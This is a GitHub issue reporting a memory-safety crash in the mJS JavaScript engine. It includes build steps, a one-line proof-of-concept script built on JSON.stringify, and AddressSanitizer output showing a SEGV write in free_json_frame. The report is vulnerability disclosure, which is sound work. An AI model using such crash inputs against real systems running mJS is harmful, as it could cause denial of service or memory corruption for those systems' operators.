New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

Comments

mJS revision

Commit: b1b6eac

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)

save the makefile then make

make

Test casepoc.js

(JSON.stringify([1, 2, 3]))((JSON.stringify-6.34321e2)(JSON.stringify([1, 2, 3])));

​Execution steps & Output

$ ./mjs/build/mjs poc.js > $ Gmjs poc.js ASAN:DEADLYSIGNAL ================================================================= ======ERROR: AddressSanitizer: SEGV on unknown address 0x561b4e461e9c (pc 0x561b4e461ed5 bp 0x000000000080 sp 0x7ffdacf6fb18 T0) ======The signal is caused by a WRITE memory access. #0 0x561b4e461ed4 in free_json_frame src/mjs_json.c:323 #1 0x561b4e461ed4 in mjs_json_parse src/mjs_json.c:476 #2 0x7ffdacf6fc0f (<unknown module>)

AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/mjs_json.c:323 in free_json_frame ======ABORTING

Credits: Found by OWL337 team.

1 participant